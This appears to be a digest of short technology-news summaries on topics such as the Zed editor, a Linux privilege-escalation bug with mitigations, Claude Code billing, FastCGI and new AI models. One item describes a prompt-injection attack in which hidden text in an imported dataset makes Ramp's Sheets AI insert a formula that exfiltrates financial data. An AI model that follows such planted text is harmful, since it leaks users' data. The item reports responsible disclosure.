Zed, the GPU-accelerated code editor built in Rust by the creators of Atom, has reached version 1.0 after five years of development. Rather than building on Electron or web technology, Zed created its own UI framework (GPUI) that renders via GPU shaders, enabling exceptional performance across Mac, Windows, and Linux. The 1.0 release covers multi-language support, Git integration, SSH remoting, debugging, and over a million lines of code. Zed is AI-native from the ground up, supporting parallel agents, keystroke-level edit predictions, and the Agent Client Protocol (ACP), integrating external agents including Claude, Codex, OpenCode, and Cursor. The team is also launching Zed for Business with centralized billing and role-based access controls. Looking ahead, DeltaDB — a CRDT-based synchronization engine — is in development to enable character-level collaborative editing between humans and AI agents, a capability the team argues is impossible without owning the full stack.

CVE-2026-31431, "Copy Fail," is a Linux local privilege escalation found by AI tool Xint Code in roughly one hour. Unlike typical LPEs requiring race conditions or kernel-specific offsets, this straight-line logic flaw in authencesn AEAD handling chains through AF_ALG sockets and splice() into a 4-byte page-cache write, requiring only an unprivileged local user. A 732-byte Python 3.10+ script works unmodified across all mainstream Linux distributions with kernels built between 2017 and the patch, confirmed on Ubuntu 24.04, Amazon Linux 2023, RHEL 10.x, and SUSE 16. The attack surface spans shared dev boxes, CI runners, container hosts, and any multi-user kernel environment. Mitigation includes disabling algif_aead via modprobe, blocking AF_ALG via seccomp, or applying mainline kernel commit a664bf3d603d, which reverts the 2017 in-place algif_aead optimization. The PoC is published for defenders to verify systems; the same scan surfaced additional high-severity bugs still under coordinated disclosure.

A GitHub issue revealed that Claude Code (v2.1.119) routes API requests to "extra usage" billing instead of the included Max plan quota when "HERMES.md" appears in recent git commit messages. The bug affected a Max 20x plan subscriber ($200/month) who consumed only 13% of weekly capacity but was charged $200.98 in extra usage. The trigger is specifically the string in commit history — not a file on disk — and is case-sensitive: lowercase "hermes.md," "HERMES" alone, and "HERMES.txt" don't trigger it. Claude Code includes recent commits in its system prompt, and something server-side routes differently when HERMES.md is detected. The user identified the cause through systematic binary search, testing orphan branches and isolating individual commit strings. Initial Anthropic support denied compensation for technical errors — later confirmed to have been an AI-generated response. Thariq from the Claude Code team announced full refunds plus bonus credits equal to each affected user's monthly subscription. Anthropic attributed the root cause to "an overactive anti-abuse system" that has since been fixed.

Rheinmetall, Germany's largest defense firm, has dramatically scaled up ammunition and military equipment production, with CEO Armin Papperger claiming Germany now surpasses the United States in conventional ammunition production capacity. Artillery shell output grew from 70,000 to 1.1 million per year, medium-caliber ammunition from 800,000 to 4 million, and military trucks from 600 to 4,500 annually. The company received 350,000 job applications in 2025 alone, currently employs 44,000 people (targeting 70,000 by 2030), and works with 11,500 German suppliers—4,500 of which also serve the automotive sector. Papperger suggests arms production could replace roughly a third of jobs lost in Germany's declining automotive industry. This expansion aligns with Germany's first-ever official military strategy naming Russia the primary threat to European security, with Berlin aiming to build Europe's most powerful conventional army.

FastCGI, 30 years old, solves two critical HTTP security problems in reverse proxy-to-backend communication. HTTP/1.1's ambiguous message framing enables desync/request-smuggling attacks where proxy and backend disagree on message boundaries — a recurring vulnerability despite patching efforts. FastCGI uses explicit framing; HTTP/2 also fixes this but has far less proxy support (nginx only added HTTP/2 backend support in late 2025, Apache's remains experimental). HTTP also lacks structural separation between trusted proxy-injected headers and untrusted client headers, allowing spoofing of X-Real-IP or True-Client-IP. FastCGI solves this by prefixing client HTTP headers with "HTTP_", with REMOTE_ADDR automatically populating Go's http.Request. Major proxies (nginx, Apache, Caddy, HAProxy) support FastCGI, and Go's stdlib makes switching as simple as replacing http.Serve with fcgi.Serve. Downsides include no WebSocket support, inferior tooling (curl cannot make FastCGI requests), and unoptimized throughput on some workloads. The author has run FastCGI in production for over 10 years and advocates adoption despite its vintage status.

Neal Agarwal has launched a new multiplayer cursor-based interactive playground on neal.fun, where visitors from around the world share a whimsical virtual space and interact in real time through their cursors. The world features activities including beach volleyball, soccer, a pool with a diving board, a stage for impromptu dance parties, a cave with a flashlight effect, a waterfall, a DJ booth, and a beach yurt serving mushroom soup. Players can earn nine badges — Cannonball!, Treasure Hunter, Goal!, S'more Please, Cat Person, Take a Seat, Slide!, Beachcomber, and Green Thumb — by discovering hidden interactions. Technical highlights include use of Rive for animation, country-based player detection that differs from standard GeoIP, and mobile support, though some devices heat up under sustained use. One friction point noted is that re-implementing mouse movement introduces sensitivity problems on trackpads.

Gooseworks, a 3-person startup from the founders of Athina AI (used by Perplexity, Doximity, and others), is hiring a Founding Growth Engineer to build and operate AI-powered growth engines for customers using their "Goose" platform. The role splits roughly 50/50 between running real GTM work for customers (outbound, SEO/AEO, Reddit, influencer marketing, content) and R&D to convert those one-off engagements into templatized, self-serve playbooks that Goose agents run autonomously. Goose is described as an OpenClaw-style AI coworker with its own filesystem, memory, email, accounts, and integrations, reachable via Slack, Telegram, or email like any human coworker. Their thesis is that GTM/growth work is undergoing the same transformation coding did three years ago, with orchestration and workspace context being the bottleneck rather than model capability. The target customer is founders, GTM engineers, and growth operators at fast-growing startups who want 10x execution speed. The ideal candidate has measurable, compounding growth results from prior startups or agency work—viral launches and Product Hunt wins explicitly don't meet the bar.

Haskell earns praise for its powerful type system, algebraic data types, monads, and popularizing mathematical concepts in programming, but proves frustrating for rapid prototyping due to monadic abstraction overhead, strict pure/impure separation, and complex dependency management. The author describes spending hours wrestling with Haskell's XML libraries where a JVM solution would take minutes, ultimately abandoning the prototype entirely. Scheme (specifically GNU Guile) is preferred for its interactive REPL via SWANK-style integration—enabling live debugging, incremental development, and function redefinition without restart—and its flexible macro system that allows metaprogramming with far less ceremony than Haskell's Template Haskell. Haskell's DSL-heavy Hackage ecosystem (Parsec, Servant, etc.) imposes steep, inconsistent learning curves across libraries, while Lisp's s-expressions provide a unified data representation model. The author frames Haskell as a "platonic ideal" illuminating functional programming theory but too rigid for most practical work, while acknowledging Scheme's weaker enterprise ecosystem versus JVM alternatives.

A webpage attempts to illustrate Monero's core privacy feature by presenting a specific Monero wallet address and noting that any attempt to view its balance is futile — Monero's protocol by design hides transaction amounts and balances from outside observers, unlike transparent blockchains such as Bitcoin. The address shown (47xmhb...S7Fyv2) is not random; it belongs to The Rage, an independent journalism outlet, and is used for public donations. The page's tone is sardonic, framing the privacy block as Monero "saying no" to snooping, effectively serving as both a demonstration and a soft advertisement for Monero's anonymity guarantees.

The content catalogs roughly 30 foundational UX and cognitive psychology principles as brief one-sentence definitions, covering interaction design (Fitts's Law, Hick's Law, Doherty Threshold <400ms), visual perception via Gestalt principles (proximity, similarity, closure, common region, uniform connectedness), and memory constraints (Miller's 7±2 items, serial position effect, working memory, Zeigarnik Effect). Behavioral patterns include the Pareto 80/20 rule, Parkinson's Law, goal-gradient effect, and peak-end rule. Other entries cover Jakob's Law, Tesler's Law of Conservation of Complexity, Von Restorff isolation effect, Occam's Razor, Postel's Law, aesthetic-usability effect, cognitive bias, cognitive load, mental models, flow state, chunking, selective attention, and poka-yoke (users skip manuals). The collection is formatted as a poster-style visual reference aimed at designers and developers seeking a consolidated checklist of established UX principles.

A vulnerability in Ramp's Sheets AI allowed indirect prompt injections hidden in externally sourced datasets to manipulate the AI into inserting malicious formulas that silently exfiltrate financial data with no user approval. The attack embeds white-on-white hidden text in an imported dataset, instructing the AI to collect sensitive data and build an IMAGE formula pointing to an attacker URL with the victim's financials appended as query parameters—which fires automatically. PromptArmor disclosed the issue to Ramp on February 19, 2026, but received no response until March 14 after two follow-ups; Ramp attributed the delay to a transition between disclosure programs and confirmed a fix on March 16. A nearly identical flaw was previously found in Claude for Excel; Anthropic remediated it with a red warning interstitial displaying full formulas before insertion. Ramp's specific fix was not publicly detailed.

This open-source project provides freely available plans for a 3D-printed stethoscope validated in a peer-reviewed PLOS ONE study to perform comparably to the Littmann Cardiology III gold standard, with total material cost targeting ~$1-4 USD. Printed components — head, ear tubes, Y-piece, spring, and ring — must be produced in PETG or ABS at mandatory 100% infill with 0.2mm layer height, as any lower infill directly degrades acoustic output. Hardware includes silicone tubing in two diameters (8mm ID/13mm OD and 4mm ID/8mm OD, both 50 durometer), a 40mm diaphragm cut from a ~0.35mm plastic report cover, and standard large earbuds. PLA is explicitly discouraged due to heat deformation and early spring failure. Source files are generated via CrystalSCAD and OpenSCAD, and the project is released under the TAPR Open Hardware License. Assembly involves attaching the diaphragm to the head, routing silicone tubing through the Y-piece, and connecting spring-mounted ear tubes to standard earbuds.

Postgres lateral joins let subqueries reference preceding FROM clause columns, producing the same query plan as a standard INNER JOIN. This enables composable query DSLs, unlike ORMs (which hide joins but cause painful M2M update bugs) or plain SQL generators (which lack composability). Inspired by Haskell's Rel8, the author built a Rust equivalent where each closure line adds a CROSS JOIN LATERAL and where_ adds a WHERE clause. Expr<'scope, T> uses Rust's borrow checker to prevent expressions escaping their valid scope. User tables use a TableMode GAT that switches field types between &str, raw values, and Expr, with MapTable enabling field traversal without combinatorial trait impls. The library supports aggregations via .aggregate(), left-outer joins via .optional(), and row collection via .many(). Compile-time guarantees ensure only valid SQL is generated. Sea-query serves as the underlying AST builder.

Elsevier removed John Goodell, Editor-in-Chief of RIBAF, in a citation cartel crackdown that already ousted Brian Lucey and Samuel Vigne from five other journals. Goodell's output surged from single digits pre-2021 to 53-58 papers annually, propelled by 125 papers gifted across three journals he co-controlled, pushing his citations to 15,663—with 4,203 earned in 2025 alone, producing the J-curve signature of citation rings. The scheme was an industrial quid pro quo: junior scholars submitted to RIBAF, added Goodell as co-author at other journals, and their submissions were accepted. A network analysis placed Goodell as the most influential researcher among 500 top finance professors in the Elsevier ecosystem. One Edinburgh Napier professor published 22 RIBAF papers in 2024-2025, adding Goodell to 14 papers at other journals, and appears to have scrubbed and quietly restored those publications from Google Scholar. Elsevier's guidelines require editorial recusal for co-author submissions—rules Goodell violated hundreds of times. An estimated 200-350+ RIBAF papers are retraction candidates, but Elsevier appears to be containing the scandal rather than confronting it.

Kyoto's cherry blossom peak bloom dates have been recorded since 812 AD, forming what is regarded as the longest continuous record of any natural phenomenon on Earth. Compiled by Yasuyuki Aono from imperial diaries, monastery records, and modern meteorological data — archived at NOAA Paleoclimatology — the dataset reveals a clear climate signal over more than a millennium. For most of that span, peak bloom fell in early-to-mid April, with the Little Ice Age visible as a drift toward later peaks between the 14th and 19th centuries. Beginning around 1900, the 30-year rolling mean fell sharply, dropping below any value recorded during the Heian period. The 2026 peak arrived March 29 — over two weeks earlier than the pre-modern average. Though local to one species in one city, its extraordinary length makes it a uniquely credible climate proxy. The piece also notes that centuries of observation gave Japanese a precise seasonal vocabulary — words like 満開 (mankaii, full bloom) and 花吹雪 (hanafubuki, blossom blizzard) — and uses this to promote JIVX, an AI-graded Japanese language app.

Tangled is a federated Git collaboration platform built on AT Protocol, positioning itself as a GitHub alternative amid recent reliability concerns. Code servers called "knots" use standard git for transfer while AT Protocol handles issues, pull requests, follows, stars, and collaborator invites. Developers can push to their own server and open pull requests against repos on entirely different servers. Social features integrate with the broader Bluesky ecosystem. Active users praise the Spindles CI/CD system, static site hosting, native Jujutsu VCS support, and an open API built on shared AT Protocol standards. Tangled has received seed funding including from Bain Capital Crypto, raising enshittification concerns typical of VC-backed platforms. Critics debate whether AT Protocol is preferable to ActivityPub, modernized email-based workflows like git format-patch, or simply configuring multiple git remotes. Alternatives include ForgeFed, Forgejo's federation roadmap, Nostr-based gitworkshop.dev, and Radicle. Some argue what is truly needed is an implementation-agnostic SDLC API standard rather than another federated transport protocol.

The Dutch government has launched code.overheid.nl, a self-hosted open-source code platform built on Forgejo, an open-source European alternative to GitHub and GitLab that prioritizes digital sovereignty. The pilot is initiated by the Open Source Program Office at the Ministry of Interior (BZK), in collaboration with DAWO, Opensourcewerken, and developer.overheid.nl, with participation not yet open to all government bodies. A notable early project is "regelrecht," which encodes Dutch legal texts as structured YAML and executes them as deterministic decision logic with full explanation trails. Germany operates a comparable platform at opencode.de (built on GitLab) with hardened container images, while the UK government has catalogued over 17,000 open-source projects. The platform launched to significant public interest, experiencing an HN-driven traffic spike, but issues noted include dark mode readability failures, i18n inconsistencies, residual GitHub references in repos, and a choice to deploy pre-release Forgejo v16 over stable v15.

Operation PowerOFF is an international law enforcement effort led largely by the Dutch Police targeting DDoS-for-hire services. A researcher found two honeypot sites: cyberzap.fun, a covert fake booter with a realistic dashboard collecting user IPs and emails as evidence, and netcrashers.net, an overt scare-tactic site redirecting visitors to a police warning page. The covert site used bit.nl hosting — a Dutch police telltale — and had only 14 prior "attack" orders, suggesting limited reach. After registering with an obvious research email, the researcher found cyberzap.fun locked with a 401 shortly after probing, along with an unused associated domain. The operation also released an AI-generated video dramatizing a police raid on a teenager for DDoS attacks, dismissed as propaganda. The broader goal appears to be creating suspicion around booter services to deter users beyond just making arrests. Operation PowerOFF used similar infiltration tactics before, documented by the UK's NCA in 2023. Cyberzap.fun was registered April 3, 2025 but was empty when archived in July 2025, raising questions about its actual launch.

A post by @GlennMeder on X (inaccessible without JavaScript) argues mandatory online age verification is a trojan horse for mass surveillance, warning that identity infrastructure will ultimately require all users to prove who they are before accessing websites or apps. The post claims children will lose the ability to explore or speak freely online without permanent logging. This is debated against accelerating legislation: the UK's Online Safety Act is in effect, Australia has social media age limits with influencer loopholes, and Greece has reportedly moved to ban online anonymity entirely. Technical alternatives cited include zero-knowledge proofs, fully homomorphic encryption, anonymous credential systems, RTA content headers, and Estonia's hardware-key identity model. Critics argue parental responsibility — not surveillance infrastructure — should govern children's internet access, while supporters contend age verification for social media and pornography reasonably extends existing regulations around gambling and alcohol.

The blaster beam is a large electric instrument — a 12–18-foot metal beam strung with tensed wires and fitted with movable guitar pickups — that produces a distinctive dark, bass tone when plucked or struck with fingers, sticks, or pipes. Designed by John Lazelle in the early 1970s and first widely used by Francisco Lupica, it gained widespread fame through Craig Huxley's refined aluminum version, most notably in Jerry Goldsmith's score for Star Trek: The Motion Picture (1979) as the signature V'ger sound, and earlier that year on a Wonder Woman episode. Huxley patented his design in 1984 and co-wrote David Shire's 2010 (1984) score, while James Horner used it in Battle Beyond the Stars (1980) and Star Trek II: The Wrath of Khan (1982). It also appeared in The Black Hole, Dreamscape, Meteor, and Star Wars: Episode II for the seismic charge sound, and in Bear McCreary's 10 Cloverfield Lane (2016). A notable curiosity arose in the early 1990s when women at a Central Park concert claimed arousal from the sound, prompting an Australian radio experiment that yielded no similar results from listeners.

Vera is a programming language designed for LLMs to write, compiling to WebAssembly and running in browser or CLI. Rather than variable names, it uses typed structural references (@Int.0, @Int.1) to eliminate naming errors models commonly make. Every function requires mandatory contracts — preconditions, postconditions, and effect declarations — verified by Z3 SMT solver, making division by zero a compile-time type error. Effects are fully typed: a function using HTTP or LLM inference must declare those in its signature, and callers lacking those permissions cannot invoke it. Three-tier verification covers decidable arithmetic statically, guided cases, and runtime fallback. The compiler emits LLM-oriented diagnostics with stable error codes, JSON output, and fix instructions with code examples. VeraBench results show Kimi K2.5 achieves 100% run_correct on Vera versus Python's 86% and TypeScript's 91%, with three models beating TypeScript. The reference compiler is at v0.0.127 with 3,638 tests and 96% code coverage; the roadmap targets a verified MCP tool server where contracts guarantee tool schemas at compile time.

Maryland became the first US state to ban grocery surveillance pricing, signed Tuesday by Governor Wes Moore. Surveillance pricing uses personal data — location, search history, demographics — to charge buyers the maximum they'll pay. The FTC under Biden documented the practice broadly, but the current administration is unlikely to act; Colorado, California, Massachusetts, Illinois, and New Jersey are considering similar laws. Critics say Maryland's law is undermined by exemptions for loyalty programs and promotional offers — letting retailers raise baseline prices then offer personalized discounts, achieving the same discriminatory outcome the law aims to prohibit. Enforcement falls to the attorney general only; individuals cannot sue, and penalties are capped at $10,000 for a first offense and $25,000 for subsequent violations. Consumer Reports called enforcement "weak" and urged lawmakers to revisit the legislation. Instacart, previously exposed by Consumer Reports, says it already stopped the practice. Advocates warn other states may replicate Maryland's law, calling it an "industry-written permission slip."

Mitchell Hashimoto, creator of Ghostty terminal emulator and GitHub user #1299 since February 2008, announced Ghostty will leave GitHub after 18 years, citing near-daily platform outages blocking productive work. Over a recent month he kept a journal marking impacted days — nearly every day got an X — with the core problem being not Git itself but centralized tooling around it: Issues, PRs, and Actions. He describes deep personal attachment to GitHub but says it is "no longer a place for serious work." The migration is incremental: a read-only mirror stays at the current URL, personal projects remain on GitHub for now, and the team is evaluating commercial and FOSS alternatives, with an announcement due in coming months. Hashimoto pre-empts two criticisms: the timing is coincidental with the large April 27, 2026 Elasticsearch outage (the post was written a week earlier referencing a separate Actions outage), and the problem is not distributed Git but GitHub's centralized infrastructure layer. He also apologizes for publicly lashing out at GitHub employees, attributing his anger to genuine long-standing affection for the platform.

macOS virtualization on Apple Silicon is built on a hypervisor and Virtio drivers (a standard by Rusty Russell), which abstract I/O devices so that virtualizer apps need only configure Virtio devices rather than implement low-level hardware support. Apple built Virtio into macOS with Monterey, so both host and guest must run Monterey or later. Performance is near-native: CPU single-core ~94% of host, GPU Metal ~92%, and VM Performance-core threads can outpace the host's Efficiency-core equivalent. Rosetta 2 works inside macOS VMs for 64-bit Intel apps but cannot translate a guest OS (UTM handles that via emulation). Key limitations include: most App Store apps fail due to signing restrictions; a hard cap of two concurrent VMs is enforced by macOS; iCloud requires Sequoia on both host and guest. Network always presents as Ethernet, audio is partial, and the license limits VM use to dev, testing, macOS Server, or personal non-commercial use. Practical uses include compatibility testing, sandboxed security work, running version-incompatible apps, and accessing a secondary iCloud account.

Mistral has released Medium 3.5, a 128B dense model with a 256k context window handling instruction-following, reasoning, and coding in a single set of weights, available as open weights under a modified MIT license. Scoring 77.6% on SWE-Bench Verified, it outperforms Devstral 2 and Qwen3.5 397B A17B while self-hosting on as few as four GPUs, becoming the new default in Le Chat and Vibe CLI. Remote cloud coding agents in Vibe allow async sessions to run in parallel, with local CLI sessions "teleportable" to the cloud carrying full session history and approvals. Integrations span GitHub, Linear, Jira, Sentry, and Slack, targeting high-volume defined work like refactors, test generation, and dependency upgrades. A new Work mode in Le Chat uses Medium 3.5 as a multi-step agentic backend for cross-tool workflows across email, calendar, documents, and web research, requiring explicit approval before sensitive actions. API pricing is $1.5 per million input tokens and $7.5 per million output tokens, on Pro, Team, and Enterprise plans, with open weights on Hugging Face.

Tim Paterson's original DOS source listings — physical printouts on continuous-feed paper — have been transcribed and published as compilable assembly source code. The collection spans 10 bundles printed between 1981 and 1982, containing the 86-DOS 1.00 kernel, various PC-DOS 1.00 pre-release kernels and utilities, and the Microsoft BASIC-86 Compiler runtime library. Key files include 86DOS.ASM, 86DOS.A86, EDLIN.DIF, CHKDSK.A86, and BASLIB.PRT. Three download tiers are offered: raw transcription of printer output, extracted original files, and fully compilable source. CRC checksums embedded in the original printout margins were used to self-verify OCR accuracy during transcription. The source targets Seattle Computer Products' ASM assembler and HEX2BIN utility, both available from early 86-DOS or MS-DOS releases. Bundles 9 and 10, totaling nearly 480 pages covering the BASIC runtime library and graphics routines (PAINT.ASM, CIRCLE.ASM), remain untranscribed and are open for pull request contributions. The release enables direct examination of whether CP/M code from Gary Kildall was incorporated into the earliest DOS version.

AT Protocol (atproto) is a decentralized social data network developed by Bluesky where all social objects — posts, likes, follows, profiles — are stored as strongly-typed JSON records in user repositories. Records use shared schemas for composition and extension, content-IDs for strong cross-user linking, and every object has a canonical URL. The protocol exposes a public firehose (WebSocket event stream) of all public activity requiring no API key, letting developers build feeds, bots, search engines, and live applications. A bsky.storage tool automates periodic account data backups to a storage network and provides PLC identity backup and recovery, giving users stronger data control without self-hosting a full Personal Data Server (PDS). The protocol's core model is: users publish JSON records into repositories, and changestreams of those records sync across the network to drive applications — though this summary is buried behind a "GET STARTED" click rather than displayed prominently on the landing page.